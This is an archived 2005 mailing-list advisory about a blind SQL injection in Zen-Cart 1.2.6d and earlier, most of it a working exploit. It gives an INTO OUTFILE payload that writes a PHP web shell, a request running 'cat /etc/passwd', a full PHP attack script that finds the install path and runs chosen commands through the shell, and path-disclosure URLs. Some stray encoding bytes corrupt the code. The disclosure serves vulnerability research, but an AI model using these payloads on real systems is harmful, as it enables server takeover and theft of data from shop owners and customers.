= 1.2.6d blind SQL injection / remote commands execution:
Date: Mon, 05 Dec 2005 09:37:39 -0500
To: [email protected]
Subject: = 1.2.6d blind SQL injection / remote commands execution:
From: [email protected]
X-Mailer: GWAVA Archive Mailer
Content-Type: multipart/mixed;
boundary="----=_NextPart_a83_81d2_dfc246ed.9a6a6c42_.MIX"
Message-ID: <CHILKAT-MID-13a4bfed-2a8f-4607-98c2-6bf39a3403b0@George_NewPC.Redsoft-2000.com.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
This is a multi-part message in MIME format.
------=_NextPart_a83_81d2_dfc246ed.9a6a6c42_.MIX
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Zen-Cart <=3D 1.2.6d blind SQL injection / remote commands execution:
software:
site: http://www.zencart.com/
description:"Zen Cart truly is the art of e-commerce; a free, user-fr=
iendly,
open source shopping cart system. The software is being d=
eveloped
by group of like-minded shop owners, programmers, design=
ers, and
consultants that think e-commerce could be and should =
be done
differently.[..]"
i) blind SQL INJECTION -> remote commmands/code execution
vulnerable code in admin/password_forgotten.php:
=2E..
if (isset($_POST['submit'])) {
if ( !$_POST['admin_email'] ) {
$error_check =3D true;
$email_message =3D ERROR_WRONG_EMAIL_NULL;
}
$admin_email =3D zen_db_prepare_input($_POST['admin_email']);
$sql =3D "select admin_id, admin_name, admin_email, admin_pass from " =
=2E TABLE_ADMIN . " where admin_email =3D '" . $admin_email . "'";
=2E..
if magic_quotes_gpc both on & off
you can post an e-mail like this to create a shell:
'UNION SELECT 0,0,'<?php system($_GET[cmd]); ?>',0 INTO OUTFILE '[full_a=
pplication_path]shell.php' FROM admin/*
so query become:
select admin_id, admin_name, admin_email, admin_pass from admin where ad=
min_email =3D ''UNION SELECT
0,0,'<?php system($_GET[cmd]);?>',0 INTO OUTFILE '[full_application_path=
]shell.php FROM admin/*'
and after launch commands:
http://[target]/[path]/shell.php?cmd=3Dcat%20/etc/passwd
this is my proof of concept exploit:
<?php
# ---zencart_126d_xpl.php 19.42 02/12/2005=
#
# =
#
# Zen-Cart <=3D 1.2.6d blind SQL injection / remote commands execution =
#
# coded by rgod =
#
# site: http://rgod.altervista.org =
#
# =
#
# -> this works with magic_quotes_gpc both on & off =
#
# =
#
# usage: launch from Apache, fill in requested fields, then go! =
#
# =
#
# Sun-Tzu: "With his forces intact he will dispute the mastery =
#
# of the Empire, and thus, without losing a man, his triumph =
#
# will be complete. This is the method of attacking by stratagem." =
#
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'<html><head><title>Zen-Cart<=3D1.2.6d blind SQL injection/ remote c=
mmnds xctn
</title><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3D=
iso-8859-1">
<style type=3D"text/css"> body {background-color:#111111; SCROLLBAR-AR=
ROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081=
; } img
{background-color: #FFFFFF !important} input {background-color: =
#303030
!important} option { background-color: #303030 !important} =
textarea
{background-color: #303030 !important} input {color: #1CB081 !important}=
option
{color: #1CB081 !important} textarea {color: #1CB081 !important} =
checkbox
{background-color: #303030 !important} select {font-weight: normal; =
color:
#1CB081; background-color: #303030;} body {font-size: 8pt !im=
portant;
background-color: #111111; body * {font-size: 8pt !important} h1 {fo=
nt-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-siz=
e: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-siz=
e: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0=
=2E8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {fon=
t-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a=
:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: un=
derline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, san=
s-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, san=
s-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class=3D=
"Stile6">
Zen-Cart<=3D1.2.6d blind SQL injection/ remote cmmnds xctn</p><p class=3D=
"Stile6">a
script by rgod at <a href=3D"http://rgod.altervista.org"target=
=3D"_blank">
http://rgod.altervista.org</a></p><table width=3D"84%"><tr><td width=3D"=
43%"> <form
name=3D"form1" method=3D"post" action=3D"'.strip_tags($SERVER[PHP_SELF]=
).'"><p><input
type=3D"text" name=3D"host"> <span class=3D"Stile5">* hostname (ex:www.=
sitename.com)
</span></p> <p><input type=3D"text" name=3D"path"> <span class=3D"Stile=
5">* path (ex:
/zencart/ or just / ) </span></p><p><input type=3D"text" name=3D"command=
"> <span
class=3D"Stile5"> * specify a command </span> </p> <p> <input t=
ype=3D"text"
name=3D"application_path"> <span class=3D"Stile5"> full application pa=
th (ex:
"/www/zencart/", "../../www/zencart/","c:\www\zencart\" ), if not specif=
ied, we
will try to disclose the path </span> </p> <p> <input type=3D"text" nam=
e=3D"port">
<span class=3D"Stile5">specify a port other than 80 ( default valu=
e )</span>
</p><p><input type=3D"text" name=3D"proxy"><span class=3D"Stile5"> s=
end exploit
through an HTTP proxy (ip:port)</span></p><p><input type=3D"submit" nam=
e=3D"Submit"
value=3D"go!"></p></form> </td></tr></table></body></html>';
function show($headeri)
{
$ii=3D0;
$ji=3D0;
$ki=3D0;
$ci=3D0;
echo '<table border=3D"0"><tr>';
while ($ii <=3D strlen($headeri)-1)
{
$datai=3Ddechex(ord($headeri[$ii]));
if ($ji=3D=3D16) {
$ji=3D0;
$ci++;
echo "<td> </td>";
for ($li=3D0; $li<=3D15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
=E0=11=0C=0C=E0 }
$ki=3D$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)=3D=3D1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=3D1; $li<=3D(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=3D$ci*16; $li<=3Dstrlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
=E0=11=0C=0C=E0 }
echo "</tr></table>";
}
$proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if =
not,load
=E0=11=0C=0C=E0 //next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket =3D socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_stre=
rror($socket) . "<br>";
}
else
=E0=11=0C=0C=E0 { $c =3D preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$=
port."...<br>";
if ($proxy=3D=3D'')
=E0=11=0C=0C=E0 {
=E0=11=0C=0C=E0 $result =3D socket_connect($socket, $host, $port);
=E0=11=0C=0C=E0 }
=E0=11=0C=0C=E0 else
=E0=11=0C=0C=E0 {
=E0=11=0C=0C=E0 $parts =3Dexplode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy=
=2E..<br>';
=E0=11=0C=0C=E0 $result =3D socket_connect($socket, $parts[0],$parts[1=
]);
=E0=11=0C=0C=E0 }
=E0=11=0C=0C=E0 if ($result < 0) {
echo "socket_connect() failed.\r\nR=
eason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
=E0=11=0C=0C=E0 {
echo "OK.<br><br>";
$html=3D '';
socket_write($socket, $packet, strl=
en($packet));
echo "Reading response:<br>";
while ($out=3D socket_read($socket,=
2048)) {$html.=3D$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
=E0=11=0C=0C=E0=E0=11=0C=0C=E0 }
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=3D=3D'')
{$ock=3Dfsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
=E0=11=0C=0C=E0die; }
}
else
{
$c =3D preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=3Dexplode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=3Dfsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
=E0=11=0C=0C=E0die;
=E0=11=0C=0C=E0 }
}
fputs($ock,$packet);
if ($proxy=3D=3D'')
{
$html=3D'';
while (!feof($ock))
{
$html.=3Dfgets($ock);
}
}
else
{
$html=3D'';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x=
0a),$html)))
{
$html.=3Dfread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
function disclose_path($paths)
{ global $p,$paths,$host,$html,$application_path;
for ($i=3D0; $i<=3Dcount($paths)-1; $i++)
{
$packet=3D"GET ".$p.$paths[$i]." HTTP/1.1\r\n";
$packet.=3D"Host: ".$host."\r\n";
$packet.=3D"Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi('Fatal error',$html))
{
$temp=3Dexplode('in <b>',$html);
$temp2=3Dexplode('</b>',$temp[1]);
$result[$i]=3D$temp2[0];
$temp=3Dexplode('/',$paths[$i]);
$temp2=3Dexplode($temp[0],$result[$i]);
$result[$i]=3D$temp2[0];
echo "<br>".htmlentities($result[$i])."<br>";
$application_path=3D$result[$i];
break;
}
}
}
$host=3D$_POST[host];$path=3D$_POST[path];
$port=3D$_POST[port];$command=3D$_POST[command];
$proxy=3D$_POST[proxy];$application_path=3D$_POST[application_path];
if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=3Dintval(trim($port));
if ($port=3D=3D'') {$port=3D80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... ch=
eck the path!'; die;}
if ($proxy=3D=3D'') {$p=3D$path;} else {$p=3D'http://'.$host.':'.$port.$=
path;}
$host=3Dstr_replace("\r\n","",$host);
$path=3Dstr_replace("\r\n","",$path);
if ($application_path=3D=3D'')
{
$paths=3D array
(
'admin/includes/graphs/banner_daily.php',
'admin/includes/graphs/banner_infobox.php',
'admin/includes/graphs/banner_yearly.php',
'admin/includes/graphs/banner_monthly.php',
'admin/includes/application_bottom.php',
'admin/includes/attributes_preview.php',
'admin/includes/modules/category_product_listing.php',
'admin/includes/modules/copy_to_confirm.php',
'admin/includes/modules/delete_product_confirm.php',
'admin/includes/modules/move_product_confirm.php'
);
disclose_path($paths);
if ($application_path=3D=3D'')
{
$packet=3D"GET ".$p."index.php HTTP/1.1\r\n";
$packet.=3D"Host: ".$host."\r\n";
$packet.=3D"Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=3Dexplode('Warning: Installation directory exists at: ',$html=
);
$temp2=3Dexplode('. ',$temp[1]);
$temp=3Dexplode('zc_install',$temp2[0]);
$application_path=3D$temp[0];
if ($application_path=3D=3D''){
$temp=3Dexplode('Warning: I am able to write to the configuratio=
n file: ',$html);
$temp2=3Dexplode('. ',$temp[1]);
$temp=3Dexplode('includes/configure.php',$temp2[0]);
$application_path=3D$temp[0];}
}
if ($application_path=3D=3D'') {die("Full application path not retriev=
ed...");}
}
$dirs=3D array
(
'', 'admin/', 'cache/', 'docs/', 'download/', 'email/', 'extras/', 'htm=
larea/',
'images/', 'includes/', 'media/', 'pub/', 'zc_install/'
);
echo "Full application path ->".htmlentities($application_path)."<br>";
$SHELL=3D'<?php echo "Hi Master!";error_reporting(0);ini_set("max_execut=
ion_time",0);system($_GET[cmd]);?>';
for ($i=3D0; $i<=3Dcount($dirs)-1; $i++) //searching a writable dir... s=
hould works at first check
{
$mypath=3D$application_path.$dirs[$i];
$temp=3D$mypath;
$mypath=3Dstr_replace('\\','\\\\\\\\',$mypath); //for Windows boxes...
if ($temp<>$mypath) str_replace('/','\\\\\\\\',$mypath);
$SQL=3D"'UNION SELECT 0,0,'".$SHELL."',0 INTO OUTFILE '".$mypath."ipn.=
php' from admin/*";
$SQL=3Durlencode($SQL);
$data=3D"admin_email=3D".$SQL."&submit=3Dresend";
$packet=3D"POST ".$p."admin/password_forgotten.php HTTP/1.1\r\n";
$packet.=3D"Host: ".$host."\r\n";
$packet.=3D"Content-Type: application/x-www-form-urlencoded\r\n";
$packet.=3D"Content-Length: ".strlen($data)."\r\n";
$packet.=3D"Connection: Close\r\n\r\n";
$packet.=3D$data;
show($packet);
sendpacketii($packet);
$packet=3D"GET ".$p.$dirs[$i]."ipn.php?cmd=3D".urlencode($command)." H=
TTP/1.1\r\n";
$packet.=3D"Host: ".$host."\r\n";
$packet.=3D"Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master",$html)) {echo "Exploit succeded..."; die;}
}
//if you are here...
echo "Exploit failed...";
}
else
{echo "Fill * required, optionally specify a proxy ";}
?>
ii) path disclosure:
also if ERROR_REPORTING is not set to 0 in php.ini you can go to the fol=
lowing locations
to disclose the path you need for injection:
http://[target]/[path]/admin/includes/graphs/banner_daily.php
http://[target]/[path]/admin/includes/graphs/banner_infobox.php
http://[target]/[path]/admin/includes/graphs/banner_yearly.php
http://[target]/[path]/admin/includes/graphs/banner_monthly.php
http://[target]/[path]/admin/includes/application_bottom.php
http://[target]/[path]/admin/includes/attributes_preview.php
http://[target]/[path]/admin/includes/modules/category_product_listing.p=
hp
http://[target]/[path]/admin/includes/modules/copy_to_confirm.php
http://[target]/[path]/admin/includes/modules/delete_product_confirm.php
http://[target]/[path]/admin/includes/modules/move_product_confirm.php
sometimes path is showned at main index.php if setup dir is not deleted
or configuration file is writable on fresh installations (bad practice..=
=2E)
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/zencart_126d_xpl.html
------=_NextPart_a83_81d2_dfc246ed.9a6a6c42_.MIX
Content-Type: text/plain;
name="GWAVADAT.TXT"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="GWAVADAT.TXT"
AdmID:1CA084E3D173389CB035577D96EE0912
------=_NextPart_a83_81d2_dfc246ed.9a6a6c42_.MIX--
